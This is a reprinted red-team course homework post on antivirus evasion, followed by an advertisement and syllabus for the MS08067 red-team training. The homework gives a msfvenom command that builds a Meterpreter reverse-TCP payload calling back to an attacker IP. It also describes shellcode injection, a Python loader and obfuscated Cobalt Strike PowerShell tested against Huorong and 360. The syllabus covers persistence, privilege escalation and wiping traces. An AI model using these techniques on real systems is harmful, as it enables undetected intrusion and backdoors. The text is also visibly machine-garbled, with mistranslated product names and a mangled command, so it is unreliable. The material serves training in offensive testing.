防火墙 火绒,常见的防火墙系统

  防火墙 火绒,常见的防火墙系统

  文章来源MS08067 红队培训班第12节课作业

  作者:汤浩荡(红队训练一班)

  按老师要求尝试完成布置的作业如下:环境准备:

  Kali linux安装cs4.2,Windows7系统安装tinder杀毒和360杀毒。为了避免查杀,防止网络查杀,关闭网络连接。

  一.Shellcode远程线程注入1.MSF生成C特洛伊木马

  msfvenom - list编码器

  //检查编码模块。经过测试,x86和x64都不能用,会导致无法上线。

  MSF venom-p Windows/Meter Preter/Reverse _ TCP LHost=172 . 16 . 12 . 145 port=4444-ECMD/PowerShell _ Base64-i5-fC-O2 . c//-E指定编码方式,-i指定编码次数,-F指定生成的文件类型。

  2.复制外壳代码内容,并注入。用loader中的远程线程生成免杀处理代码gedit1.c。

  //用C语言编辑生成的木马,复制外壳代码。

  使用vs2019构建项目,并生成源代码。cpp(内容是远程线程注入。c),替换shellcode,用mt多线程替换编译运行时。

  3.对生成的免杀代码进行免杀测试,结果如下:

  传而不杀!

  二.python加载器这种免删除方法继续使用以前生成的外壳代码,并使用记事本替换双引号,\x和\r\n

  然后替换加载程序中的外壳代码部分,如下图所示:

  使用pyinstaller将py文件生成为exe文件。

  复制exe文件,用tinder和360进行免杀测试。结果如下:

  这种方法没能杀死火绒。

  三.无文件落地免杀技术cs生成powershell联机命令

  复制powershell代码,把hex和ladon7.0混淆。

  复制双引号内的混淆代码,转到key.ps1进行免杀测试。

  天鹅绒无杀伤失败

  -四.掩日免杀框架直接运行3.1.2.exe软件。如果需要gcc运行环境,直接从github下载。安装环境的时候注意去掉。

  方法很简单,把文件拖到运行窗口就行了。目前cs代码只支持C格式的免杀和免杀测试,如下:

  天鹅绒没能杀人。

  总结:目前仅shellcode远程注入方式生成的exe通过了360和火绒的免杀,golang加载器、dll load shellcode暂不进行尝试,进行作业后实验,三件套已经做过实验,效果太差,不进行详细过程编写。

  10.1红队攻防 第3期 预招

  课程费用

  第三届价格为26998月底前报名享受早鸟价:2399(前40名学生可获得内网知识星球名额499元),每名报名学生均可享受免费听课权。如果他一次听不懂,可以再来一次,后续的任何培训课他都可以听。有兴趣参加培训的同学赶紧报名吧!

  学习资源

  报名前40名的同学将获得内网知识星球499元。他们可以提前了解内部网渗透情况,并提供课程中需要的相关软件和环境。

  上课时间

  每周五、六、日的晚间 19:00-21:00 ,共21课时,为期一个半月。如果不能按时参加直播课程,在线培训的每一门课程都会被录制成视频上传到学生区,可以随时下载观看。

  上课方式

  培训采用微信群答案在线直播录制的形式,不用等。注册后立即可以进入“内网星球”开始预览。

  讲师介绍

  讲师:A:MS08067安全实验室核心成员,原某国企安全研究员,擅长APT攻击和社会工程。

  讲师:B:MS08067安全实验室核心成员,主要从事渗透测试和安全开发的研究。参加过多次全国护网行动,有多年红队经验。

  全新课程大纲

  全新课程目录

  第1课信息收集的一般概念

  被动信息收集

  信息收集的一般概念及其在整个红队过程中的地位;

  被动信息收集的基本结构和逻辑;

  被动信息收集的常用手段(网络空间搜索、被动信息收集工具、传统搜索);

  被动信息收集后的信息处理;

  被动信息收集工具的基本原理以及如何编写它们;第2天主动收集信息

  信息收集后的综合信息处理。

  主动信息收集的基本结构和逻辑;

  主动信息收集的常用手段(仅扫描nmap和扫描goby);带POC);

  主动收集信息后的信息处理;

  主动信息收集工具的基本原理以及如何编写它们;

  如何综合处理主动信息采集和被动信息采集的信息;

  如何将收集到的信息链接到下一个红队流程;

  第三天社会工程

  社会工程的含义和实际应用;

  社会工程知识体系;

  社会工程的学习方法;

  第4天社会工程中的信息收集

  利用社会工程收集组织目标和个人目标信息的差异及实际应用:

  社会工程收集信息的常用方法;

  第5课社会工程中的信息处理和识别(信息分析)互动

  社会工程中常见的钓鱼方法及应用;

  在社会工程中,如何根据收集到的信息,利用目标的社会属性弱点进行交互;

  社会工程中获取和利用信任的方法

  【信息收集和社会工程是红队进攻的重点,必须掌握。实战干货很多。前5天请不要迟到]

  第6天免除杀人文件

  免杀中使用的编程语言及相关知识库

  程序的基本结构;

  c .免于杀戮的依据;

  python中使用的基础kill-free;

  Win32api基金会;

  c写最基本的socket;

  用python写最基础的socket;第7课免除杀人文件

  免杀中使用的编程语言及相关知识库

  有效载荷的基本结构和编程语言的实际应用;

  有效载荷的基本结构(以MSFf和CS为例);

  c2的基本原理;

  c用来写最基本的shellcode loader

  用python写最基本的shellcode loader第8天免除杀人文件

  杀毒软件的基本原理和绕过它的方法。

  根据tinder静态分析的特点,分析并绕过思维;

  windowsdefender的shellcode特征码特征分析及规避方法;

  360动态分析的特点及绕过方法分析:

  手动分析的旁路和处理;第9课Windows权限维护

  Windows权限维护概述及隐藏技巧:关闭软杀;

  自启动注册表;剧本;

  计划任务;自启动服务;

  记忆码;进程劫持;隐蔽隧道;第10天Liunx权限维护

  Liunx权限维护概述及隐藏技巧:

  添加用户;SUIDshell

  SSH公钥和私钥;软连接;

  Crontab计划任务;Strace后门Openssh后门;

  隐蔽隧道;记忆码;第11天:提高Windows Intranet的能力

  土豆家族提出权力;补丁权限;系统配置错误提升权限;

  第三方服务权利;集团政策。Bypassuac

  数据库权限;代币盗窃;收集密码,索要权利;

  第12天Liunx内部网功率提升

  系统内核提升能力;第三方服务权利;

  数据库权限;收集密码,索要权利;

  键盘记录以提高权利;Suid右边;

  须藤提高权力;壳牌的反弹和增权;第13天内部网渗透

  内部网渗透、正向代理和反向代理概述;

  花生壳网络渗透;玻璃钢网络渗透;

  Ngrok内部网渗透率;reGeorg Proxifier

  向日葵代理和teamviewer;

  最小化渗透概述;云功能;畴前;第14天:域内信息收集和域信任

  域内信息收集概述;

  域内用户组集合;域信任关系的集合;

  用户目录集合;预控制日志收集;

  Arp信息收集;TcpdumpSshkey集合;

  明配置阅读;网络拓扑分析和判断;第15天领域渗透工具的实际使用

  SetspnNslookupAdFind

  Psloggendon360safebrowserdecrypt

  SchtaskBackDoorWebshellregeditBypassUAC第16课票据伪造和域委托攻击

  PTH认证过程分析:票据伪造攻击原理

  Mimikatz实现票据伪造攻击;

  领域委托原则;域委托攻击方法;第17课森林渗透

  森林渗透概述及父域、子域、域间信任关系分析;大规模领域渗透思想;

  预控定位;Pth注射;域信任攻击;

  组策略漏洞;和网络系统漏洞;逃脱漏洞;

  第18天免杀Mimikatz和bypassUAC

  Mimikatz入门与实战;Mimikatz 18种避免杀戮的方法;

  UAC工作原理介绍;ICMLuaUtil bypassUAC;第19天痕迹清理

  Windows操作系统的痕迹清理

  窗户痕迹清理的基本思路和思维逻辑:

  Windows清理操作痕迹;

  窗户清洁时间痕迹第20课痕迹清洁

  Linux操作系统的痕迹清理

  Linux痕迹清理的基本思想和思维逻辑;

  清理Linux的登录痕迹;

  清理Linux操作痕迹;

  Lnux清理时间跟踪;

  第21课

  根据国内环境下云服务商的制作环境,将该班学生分为AB队。每个团队都有一个目标。为了模拟真实环境,将采用两家不同的云服务提供商(不透露具体厂商)。每个环境会开放不同的公共服务(服务的类型和数量都不一样,以避免通过模拟本地环境来攻击对方)。讲师将模拟普通用户使用两个团队的环境。攻击前我会私聊AB两队队长的登录环境,队长也会私聊我全单车的攻击平面的公开ip,以此来鉴定是否犯规,并在实战开始时向对方公布环境地址。*大纲仅供参考,会根据目前进度变化。

  毕业实战

  为了顺利完成课程的相关内容,学生必须提前预习相关知识点。已经报名的请购买实验室制作的书籍《内网安全攻防:渗透测试实战指南》或在赠送的MS08067实验室如何提前预习中学习相关内容。

  “内网知识星球”书籍之间的关系

  055-79000是国内第一本关于内网安全的书,2018年出版,深受校长爱好者的喜爱。这本书被定位为内部网安全的介绍,所以许多先进的技术没有包括在内。而且由于出书的特殊性,很多实际干货和想法都无法完整呈现。这本书到现在已经出版三年了,这期间出现了很多新技术。

  本质上,红队的这次攻防训练和这本书没有任何关系。那本书讲的是内网,现场训练内容是红队的进攻。但如果非要有关联,也可以理解为书本技术的延伸;是本书的进阶版,实用版,干货版。

   直播培训内容和 《内网渗透测试实战指南

  首先从内容上看,内网知识星球的定位是《内网安全攻防:渗透测试实战指南》配套技术的视频讲解。直播训练内容是一个全新的课程体系,本质上是不一样的。

  从形式上看,知识星球是一种类似论坛的形式,更有利于圈子的交流。我们提供的视频教程需要你下载,观看,练习,才能学会。买了之后不下载,下载之后不看,看了之后不练,还是没用。现场培训的目标是让你学习,而不只是给你一堆视频教程看。我们会布置作业,批改作业,有个别答案,这也是我们设置每学期学生人数的原因。

  我们非常珍惜读者对MS08067的信任。我们希望能做小而精的高质量在线培训。如果我们宣传它,把它做大,它就会变质。在这里,每个注册学生都可以享受免费重听的权利。如果一次没看懂,可以再来。如果你在实际工作中遇到问题,可以带着你的问题再听一遍。

  直播培训和内网知识星球的区别

  MS08067这几年在安全领域的口碑有目共睹。尤其是对校长感兴趣的学生和爱好者,做了一些有意义的事情。他们对读者是真诚的,一点虚假都没有。做星球的初衷是满足读者对书籍配套视频的需求。不像有些培训是以宣传和“卖教程”为主,我们的初心和技术能力从实验室四年出版四本原著就能看出来。

  本次训练以红队进攻实战应用为主,注重实战、干货、思路、深度。负责讲解的老师也是MS08067的资深核心成员,有着多年的实际工作经验,让你学到的技术能够真正用在企业中。

  很多读者告诉我,他们是从看视频和看书自学开始的,但是一旦遇到实验中的错误,就无法解决。没人回答他们不懂的技术点,也没掌握本该重点关注的技术。100%的初学者或多或少都会走一些弯路。学了1-2年,还是效率低,进步慢,有的甚至放弃了新安的贸易。学习新安需要圈子和方法,自学当然没问题。

  最后说一下现在的校长培训。有很多人

  详情请联系客服。

   为什么选择MS08067直播培训

   你距离红队大佬,只差一个决定

  扫描下方二维码加入星球学习

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: